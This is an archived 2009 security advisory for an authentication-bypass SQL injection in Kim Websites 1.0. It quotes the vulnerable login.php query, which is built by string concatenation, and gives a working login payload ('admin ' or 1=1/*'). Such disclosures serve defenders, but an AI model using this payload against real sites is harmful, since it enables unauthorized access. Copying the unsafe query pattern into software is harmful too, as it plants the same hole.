Kim Websites 1.0 (Auth Bypass) SQL Injection Vulnerability

2009.03.21
Credit: Virangar
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

############################################################### # # # Kim Websites 1.0 SQL Injection Vulnerability # # [ Authentication bypass] # ############################################################### Virangar Security Team www.virangar.net -------- Discoverd By : Virangar Security Team(hadihadi) special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & Aria_security team & all hackerz greetz:to my best friend in the world hadi_aryaie2004 & my lovely friend arash(imm02tal) ----------------------------------- vuln code in login.php: $username = $_POST['username']; $password = md5($_POST['password']); $query= "SELECT name,password FROM ".$prefix."_users WHERE name = '$username' AND password = '$password' AND confirm = 1 AND date2 > FROM_UNIXTIME($now)"; ----------------------- Exploit: login:admin ' or 1=1/* password:[blank] ------------------------------------- Y0ung Ir4ni4n H4ck3rz

References:

http://xforce.iss.net/xforce/xfdb/49259
http://www.vupen.com/english/advisories/2009/0732
http://www.securityfocus.com/bid/34116
http://www.milw0rm.com/exploits/8209


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top